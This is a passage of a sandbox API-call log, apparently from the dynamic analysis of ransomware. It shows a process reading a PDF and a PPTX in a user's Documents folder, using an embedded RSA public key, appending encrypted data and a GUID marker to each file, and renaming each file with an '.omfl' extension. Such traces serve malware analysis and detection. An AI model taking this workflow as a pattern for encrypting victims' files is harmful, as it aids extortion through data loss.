ftCreationTime.dwLowDateTime=0x1146d640, ftCreationTime.dwHighDateTime=0x1d5e30e, ftLastAccessTime.dwLowDateTime=0xf6fa4330, ftLastAccessTime.dwHighDateTime=0x1d5dac0, ftLastWriteTime.dwLowDateTime=0xf6fa4330, ftLastWriteTime.dwHighDateTime=0x1d5dac0, nFileSizeHigh=0x0, nFileSizeLow=0x9681, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KOoEJvEYeTu_MheASCq.pdf", cAlternateFileName="KOOEJV~1.PDF")) returned 1 [0130.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0130.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0130.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5d58 | out: hHeap=0x4970000) returned 1 [0130.884] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KOoEJvEYeTu_MheASCq.pdf") returned=".pdf" [0130.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KOoEJvEYeTu_MheASCq.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kooejveyetu_mheascq.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.884] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=38529) returned 1 [0130.884] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.887] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x965b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.887] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.889] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.889] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.889] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x9681, lpOverlapped=0x0) returned 1 [0130.889] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.889] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.890] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.890] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.891] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.891] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.891] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.891] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.891] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.891] GetLastError () returned 0x0 [0130.891] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.891] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.891] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.891] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.891] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.892] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.892] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9680) returned 0xdd35410 [0130.892] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.892] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34548 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16db8 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34590 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16dd0 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e00 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e18 [0130.892] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0130.893] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.893] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e00 | out: hHeap=0x4970000) returned 1 [0130.893] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e18 | out: hHeap=0x4970000) returned 1 [0130.893] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.893] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.893] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16e18 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16e00 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.893] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.893] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.893] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e18 | out: hHeap=0x4970000) returned 1 [0130.893] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.893] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e00 | out: hHeap=0x4970000) returned 1 [0130.893] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.894] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.894] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.894] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.894] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.894] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.894] GetCurrentThreadId () returned 0x618 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d6820 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.894] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.894] GetCurrentThreadId () returned 0x618 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.894] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.894] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.894] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.894] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.894] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.894] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757ca08 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.895] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e00 [0130.895] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8a0 [0130.895] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.896] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x9681, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.896] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.896] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.896] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.896] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.897] CloseHandle (hObject=0x5c8) returned 1 [0130.903] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KOoEJvEYeTu_MheASCq.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kooejveyetu_mheascq.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KOoEJvEYeTu_MheASCq.pdf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kooejveyetu_mheascq.pdf.omfl")) returned 1 [0130.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.905] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0130.907] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x207d0340, ftCreationTime.dwHighDateTime=0x1d57b0e, ftLastAccessTime.dwLowDateTime=0xb9e32d0, ftLastAccessTime.dwHighDateTime=0x1d581d2, ftLastWriteTime.dwLowDateTime=0xb9e32d0, ftLastWriteTime.dwHighDateTime=0x1d581d2, nFileSizeHigh=0x0, nFileSizeLow=0x16b65, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KQRa3iC.pptx", cAlternateFileName="KQRA3I~1.PPT")) returned 1 [0130.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KQRa3iC.pptx") returned=".pptx" [0130.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KQRa3iC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kqra3ic.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.907] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=93029) returned 1 [0130.907] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.910] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x16b3f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.911] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.912] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x16b65, lpOverlapped=0x0) returned 1 [0130.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.913] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.914] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.914] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.914] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.914] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.914] GetLastError () returned 0x0 [0130.915] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.915] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.915] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.915] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.915] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.916] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e18 | out: hHeap=0x4970000) returned 1 [0130.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e30 | out: hHeap=0x4970000) returned 1 [0130.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16e30 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16e18 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0130.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.916] HeapFree (in: hHeap=0x4970000, 